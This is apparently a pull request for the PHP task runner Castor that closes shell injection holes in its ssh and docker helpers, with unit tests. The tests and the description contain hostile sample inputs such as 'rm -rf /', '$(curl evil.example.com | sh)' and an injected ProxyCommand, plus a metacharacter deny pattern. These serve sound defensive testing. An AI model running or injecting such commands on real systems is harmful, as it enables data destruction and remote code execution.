### PR TITLE
Keep ssh and docker helper parameters out of the local shell

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -14,6 +14,8 @@
 
 ### Fixes
 
+* Quote the remote `path` of `ssh_run()`, and reject a `host`, `user`, `jump_host`, `path_private_key` or `multiplexing_control_path` containing a shell metacharacter: they end up in a local shell command line, so a value coming from user input could run a command instead of opening a connection
+* Pass the container name of `wait_for_docker_container()` to `docker` as an argument instead of building a shell command with it
 * Fix architecture detection on Linux ARM64 (`aarch64`), which made the watcher and the update hints pick the amd64 binaries
 * Fix `run()` ignoring the timeout when executed inside `parallel()`: the process was waited for in its own fiber loop, so Symfony's timeout check never ran and the process could run forever
 

--- a/doc/docs/going-further/helpers/ssh.md
+++ b/doc/docs/going-further/helpers/ssh.md
@@ -34,6 +34,13 @@ connection will automatically terminate (default: no)
 - `password_authentication` (bool): whether to use password authentication
   (default: false)
 
+> [!NOTE]
+> The host, the user and the options are placed on the `ssh` command line as
+> they are: Castor refuses a value that is empty or contains a whitespace or a
+> shell metacharacter (`;`, `&`, `|`, `$`, quotes, ...), so a value coming from
+> user input cannot turn into a local command. The `path` given to `ssh_run()`
+> is quoted for the remote shell, a leading `~` is still expanded.
+
 ## The `ssh_run()` function
 
 Castor supports running commands on remote servers through SSH with the

--- a/src/Helper/Waiter.php
+++ b/src/Helper/Waiter.php
@@ -240,9 +240,9 @@ final readonly class Waiter
             callback: function () use ($timeout, $io, $portsToCheck, $containerChecker, $containerName): bool {
                 $context = $this->contextRegistry->getCurrentContext()->withAllowFailure();
 
-                $containerId = $this->processRunner->capture("docker ps -a -q --filter name={$containerName}", context: $context);
+                $containerId = $this->processRunner->capture(['docker', 'ps', '-a', '-q', '--filter', "name={$containerName}"], context: $context);
                 $isContainerExist = (bool) $containerId;
-                $isContainerRunning = (bool) $this->processRunner->capture("docker inspect -f '{{.State.Running}}' {$containerId}", context: $context);
+                $isContainerRunning = (bool) $this->processRunner->capture(['docker', 'inspect', '-f', '{{.State.Running}}', $containerId], context: $context);
 
                 if (false === $isContainerExist) {
                     throw new DockerContainerStateException($containerName, 'not exist');

--- a/src/Runner/SshRunner.php
+++ b/src/Runner/SshRunner.php
@@ -43,7 +43,7 @@ final readonly class SshRunner
         $ssh = $this->buildSsh($host, $user, $sshOptions);
 
         if ($path) {
-            $command = \sprintf('cd %s && %s', $path, $command);
+            $command = \sprintf('cd %s && %s', self::quotePath($path), $command);
         }
 
         return $this->run($ssh->getExecuteCommand($command), $quiet, $allowFailure, $notify, $timeout, $callback);
@@ -108,12 +108,28 @@ final readonly class SshRunner
         );
     }
 
-    /** @phpstan-param SshOptions $sshOptions */
+    /**
+     * The host, user and options end up unquoted in a shell command line
+     * (see Ssh::getExecuteCommand()), so a value containing a shell
+     * metacharacter would not be an invalid host, but a local command.
+     *
+     * @phpstan-param SshOptions $sshOptions
+     */
     private function buildSsh(
         string $host,
         ?string $user = null,
         array $sshOptions = [],
     ): Ssh {
+        self::assertShellSafe('host', $host);
+        if (null !== $user) {
+            self::assertShellSafe('user', $user);
+        }
+        foreach (['path_private_key', 'jump_host', 'multiplexing_control_path', 'multiplexing_control_persist'] as $option) {
+            if (isset($sshOptions[$option])) {
+                self::assertShellSafe($option, $sshOptions[$option]);
+            }
+        }
+
         $ssh = Ssh::create($user, $host, $sshOptions['port'] ?? null);
 
         if ($sshOptions['path_private_key'] ?? false) {
@@ -133,5 +149,25 @@ final readonly class SshRunner
         }
 
         return $ssh;
+    }
+
+    private static function assertShellSafe(string $name, string $value): void
+    {
+        if ('' === $value || preg_match('/[\s\'"`$\\\;&|<>(){}*?]/', $value)) {
+            throw new \InvalidArgumentException(\sprintf('The ssh %s "%s" is not valid: it is empty, or contains a shell metacharacter.', $name, $value));
+        }
+    }
+
+    /**
+     * Quotes the remote path for the remote shell, keeping a leading "~" or
+     * "~user" unquoted so that it is still expanded.
+     */
+    private static function quotePath(string $path): string
+    {
+        if (preg_match('/^(?<home>~[^\/]*)(?<rest>.*)$/s', $path, $matches)) {
+            return $matches['home'] . ('' === $matches['rest'] ? '' : escapeshellarg($matches['rest']));
+        }
+
+        return escapeshellarg($path);
     }
 }

--- a/tests/Generated/SshLsTest.php.output.txt
+++ b/tests/Generated/SshLsTest.php.output.txt
@@ -3,7 +3,7 @@ In ls.php line XXXX:
  [ERROR] The following process did not finish successfully (exit code XX):
 
 ssh -p 2222 debian@server-1.example.com 'bash -se' << \EOF-SPATIE-SSH
-cd /var/www && ls -alh
+cd '/var/www' && ls -alh
 EOF-SPATIE-SSH
 
  // Re-run the command with the -v option to see more details.

--- a/tests/Generated/SshWhoamiTest.php.output.txt
+++ b/tests/Generated/SshWhoamiTest.php.output.txt
@@ -3,7 +3,7 @@ In whoami.php line XXXX:
  [ERROR] The following process did not finish successfully (exit code XX):
 
 ssh -p 2222 server-1.example.com 'bash -se' << \EOF-SPATIE-SSH
-cd /var/www && whoami
+cd '/var/www' && whoami
 EOF-SPATIE-SSH
 
  // Re-run the command with the -v option to see more details.

--- a/tests/Helper/WaiterTest.php
+++ b/tests/Helper/WaiterTest.php
@@ -1,0 +1,51 @@
+<?php
+
+namespace Castor\Tests\Helper;
+
+use Castor\Context;
+use Castor\ContextRegistry;
+use Castor\Helper\Waiter;
+use Castor\Runner\ProcessRunner;
+use PHPUnit\Framework\TestCase;
+use Symfony\Component\Console\Input\ArrayInput;
+use Symfony\Component\Console\Output\NullOutput;
+use Symfony\Component\Console\Style\SymfonyStyle;
+use Symfony\Component\HttpClient\MockHttpClient;
+use Symfony\Component\Process\ExecutableFinder;
+
+class WaiterTest extends TestCase
+{
+    /**
+     * The container name is passed to docker as an argument, never through a
+     * shell, so it cannot run anything even when it comes from user input.
+     */
+    public function testTheDockerContainerNameIsNotInterpretedByAShell(): void
+    {
+        if (null === new ExecutableFinder()->find('docker')) {
+            $this->markTestSkipped('docker is not installed.');
+        }
+
+        $commands = [];
+
+        $processRunner = $this->createStub(ProcessRunner::class);
+        $processRunner
+            ->method('capture')
+            ->willReturnCallback(static function (string|array $command) use (&$commands): string {
+                $commands[] = $command;
+
+                return 'abc123';
+            })
+        ;
+
+        $contextRegistry = $this->createStub(ContextRegistry::class);
+        $contextRegistry->method('getCurrentContext')->willReturn(new Context());
+
+        $waiter = new Waiter(new MockHttpClient(), $processRunner, $contextRegistry);
+        $waiter->waitForDockerContainer(new SymfonyStyle(new ArrayInput([]), new NullOutput()), 'db; touch /tmp/pwned', quiet: true);
+
+        $this->assertSame([
+            ['docker', 'ps', '-a', '-q', '--filter', 'name=db; touch /tmp/pwned'],
+            ['docker', 'inspect', '-f', '{{.State.Running}}', 'abc123'],
+        ], $commands);
+    }
+}

--- a/tests/SshRunnerTest.php
+++ b/tests/SshRunnerTest.php
@@ -2,9 +2,14 @@
 
 namespace Castor\Tests;
 
+use Castor\Context;
+use Castor\ContextRegistry;
+use Castor\Runner\ProcessRunner;
 use Castor\Runner\SshRunner;
+use PHPUnit\Framework\Attributes\DataProvider;
 use PHPUnit\Framework\TestCase;
 use Spatie\Ssh\Ssh;
+use Symfony\Component\Process\Process;
 
 class SshRunnerTest extends TestCase
 {
@@ -45,17 +50,97 @@ class SshRunnerTest extends TestCase
         $this->assertStringNotContainsString('StrictHostKeyChecking', $command);
     }
 
+    #[DataProvider('provideValidTargets')]
+    public function testValidHostsAndUsersAreAccepted(string $host, ?string $user): void
+    {
+        $this->assertStringContainsString((null === $user ? '' : $user . '@') . $host, $this->buildSshCommand([], $host, $user));
+    }
+
+    /**
+     * @return iterable<string, array{string, ?string}>
+     */
+    public static function provideValidTargets(): iterable
+    {
+        yield 'host name' => ['server-1.example.com', 'debian'];
+        yield 'IPv4' => ['10.0.0.1', 'root'];
+        yield 'IPv6' => ['[2001:db8::1]', null];
+        yield 'ssh config alias' => ['staging_web', null];
+    }
+
+    #[DataProvider('provideInvalidTargets')]
+    public function testHostsUsersAndOptionsWithShellMetacharactersAreRejected(string $host, ?string $user, array $sshOptions): void
+    {
+        $this->expectException(\InvalidArgumentException::class);
+        $this->expectExceptionMessage('shell metacharacter');
+
+        $this->buildSshCommand($sshOptions, $host, $user);
+    }
+
+    /**
+     * @return iterable<string, array{string, ?string, array<string, mixed>}>
+     */
+    public static function provideInvalidTargets(): iterable
+    {
+        yield 'command in the host' => ['example.com; rm -rf /', null, []];
+        yield 'substitution in the host' => ['$(curl evil.example.com | sh)', null, []];
+        yield 'space in the user' => ['example.com', 'debian -o ProxyCommand=evil', []];
+        yield 'command in the jump host' => ['example.com', 'debian', ['jump_host' => 'bastion && evil']];
+        yield 'command in the private key path' => ['example.com', 'debian', ['path_private_key' => '/tmp/key`evil`']];
+        yield 'command in the control path' => ['example.com', 'debian', ['multiplexing_control_path' => '/tmp/%r@%h;evil']];
+    }
+
+    #[DataProvider('providePaths')]
+    public function testTheRemotePathIsQuoted(string $path, string $expectedCd): void
+    {
+        $command = null;
+
+        $processRunner = $this->createStub(ProcessRunner::class);
+        $processRunner
+            ->method('run')
+            ->willReturnCallback(static function (string $c) use (&$command): Process {
+                $command = $c;
+
+                return new Process([]);
+            })
+        ;
+
+        $contextRegistry = $this->createStub(ContextRegistry::class);
+        $contextRegistry->method('getCurrentContext')->willReturn(new Context());
+
+        new SshRunner($processRunner, $contextRegistry)->execute('ls', $path, 'server-1.example.com', 'debian');
+
+        $this->assertStringContainsString($expectedCd . ' && ls', (string) $command);
+    }
+
+    /**
+     * @return iterable<string, array{string, string}>
+     */
+    public static function providePaths(): iterable
+    {
+        yield 'absolute path' => ['/var/www/app', "cd '/var/www/app'"];
+        yield 'path with a space' => ['/var/www/my app', "cd '/var/www/my app'"];
+        yield 'path with a command' => ['/var/www; rm -rf /', "cd '/var/www; rm -rf /'"];
+        yield 'home path' => ['~/app', "cd ~'/app'"];
+        yield 'other user home path' => ['~deploy/app', "cd ~deploy'/app'"];
+        yield 'bare home' => ['~', 'cd ~'];
+    }
+
     /**
      * @param array{
+     *     'port'?: int,
+     *     'path_private_key'?: string,
+     *     'jump_host'?: string,
+     *     'multiplexing_control_path'?: string,
+     *     'multiplexing_control_persist'?: string,
      *     'enable_strict_check'?: bool,
      *     'password_authentication'?: bool,
      * } $sshOptions
      */
-    private function buildSshCommand(array $sshOptions): string
+    private function buildSshCommand(array $sshOptions, string $host = 'server-1.example.com', ?string $user = 'debian'): string
     {
         // buildSsh() does not use the constructor dependencies, so we can skip them.
         $runner = new \ReflectionClass(SshRunner::class)->newInstanceWithoutConstructor();
-        $ssh = new \ReflectionMethod(SshRunner::class, 'buildSsh')->invoke($runner, 'server-1.example.com', 'debian', $sshOptions);
+        $ssh = new \ReflectionMethod(SshRunner::class, 'buildSsh')->invoke($runner, $host, $user, $sshOptions);
 
         $this->assertInstanceOf(Ssh::class, $ssh);
 


### PR DESCRIPTION
`ssh_run()` builds a shell command line from its host, user, options and path, and `wait_for_docker_container()` from its container name. A value coming from user input (a task argument, a CI variable, a branch name...) could turn into a local command: `host: 'srv; curl evil | sh'` runs the second part locally before `ssh` is even called.

- The remote `path` of `ssh_run()` is now quoted for the remote shell (`cd '/var/www/my app' && ...`), keeping a leading `~` or `~user` expandable.
- The `host`, `user`, `jump_host`, `path_private_key` and `multiplexing_control_path` values are refused when they are empty or contain a whitespace or a shell metacharacter, since spatie/ssh puts them on the command line as they are. Host names, IPv4, bracketed IPv6 and ssh config aliases are all still accepted.
- The `docker ps` and `docker inspect` commands of `wait_for_docker_container()` are built as argument arrays, so the container name is never interpreted by a shell.

Unit tests cover the accepted and refused values, the path quoting, and the docker command shape. The two generated ssh tests expectations are updated for the quoted path.
